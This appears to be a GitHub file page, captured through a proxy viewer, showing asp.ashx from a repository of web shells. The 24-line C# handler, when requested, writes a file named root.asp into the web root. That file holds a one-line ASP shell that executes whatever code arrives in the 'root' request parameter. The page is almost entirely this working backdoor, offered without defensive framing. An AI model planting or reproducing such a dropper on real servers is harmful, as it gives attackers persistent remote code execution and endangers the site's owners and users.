FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
WebShell/asp.ashx at master · hack-jasonx/WebShell · GitHub
hack-jasonx
/
WebShell
Public
forked from
tutorial0/WebShell
Notifications
You must be signed in to change notification settings
Fork
0
Star
0
Code
Pull requests
0
Actions
Projects
Security and quality
0
Insights
Additional navigation options
Code
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
WebShell
/
asp.ashx
Copy path
More file actions
More file actions
Latest commit
History
History
History
24 lines (18 loc) · 467 Bytes
Breadcrumbs
WebShell
/
asp.ashx
Copy path
File metadata and controls
24 lines (18 loc) · 467 Bytes
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<%
@ WebHandler Language
=
"
C#
"
class
=
"
Handler
"
%>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("
<%
response
.
clear
:execute
request
(\
"
root\
"
):
response
.
End
%>
");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
Back
|
FazBrowse Home
|
New Git URL